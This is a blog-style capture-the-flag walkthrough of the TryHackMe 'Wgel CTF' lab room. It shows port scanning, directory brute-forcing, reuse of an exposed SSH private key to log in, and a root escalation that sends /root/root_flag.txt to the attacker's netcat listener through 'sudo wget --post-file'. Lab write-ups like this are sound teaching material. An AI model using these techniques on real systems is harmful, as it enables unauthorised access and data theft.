Wgel CTF is a simple CTF room from tryhackme – check it out here. Have fun and i hope you learn something from it. Now let’s start with a simple port scan to see what we can enumerate:
nmap -sV -A $IPCommands:
-sV – shows us the version of the running service
-A – aggressive scan – runs some basic scripts on the host
Youtube Walkthrough:-
Output:
Host is up (0.058s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
| 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Now we see that there is a webserver running. Let’s start gobuster and while it’s bruteforcing the directories we can go and take a look at the webpage:
gobuster dir -u $Ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txtNow let’s see the webpage:
Hmmm a default looking apache2 webpage, but let’s check the source code. Always check the source code. And boom we have a username:
`-- *.conf
<!-- Jessie don't forget to update the website -->
</pre>Okay so gobuster returned to us only one directory called “/sitemap”. Let’s start gobuster for this directory and while it’s running let’s go and have a look:
gobuster dir -u $IP/sitemap -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txtNow let’s see the sitemap:
Okay so nothing interesting here. I tried to find something but everything was useless. Let’s check out if gobuster found something:
#i did cut out what wasn't interesing:
/.sshNow if we go to the webdirectory we can see an id_rsa key. So we can use that to log in into the box. Now let’s use wget to download it:
wget http://$IP/sitemap/.ssh/id_rsaNow if we have an id_rsa we don’t have to specify the password we just need the username that we found earlier. Now let’s use this command in order to ssh into wgel’s box:
sudo ssh -i id_rsa jessie@$IPOkay so now we are jessie. Let’s change directories to “Documents” and we can cat out the user_flag.txt. Now for root let’s first try with “sudo -l” and see what we can do:
Perfect. We will use wget to send “/root/root.txt” to our machine and we will catch it with nc. Now open up a new panel in tmux(if you don’t know how check out the tutorial here):
#in the new panel:
sudo nc -lvnp 80
#in jessie's machine:
sudo -u root /usr/bin/wget --post-file=/root/root_flag.txt <your-ip-here>Now if you check your nc you will see the output from the root flag.
Comments
Post a Comment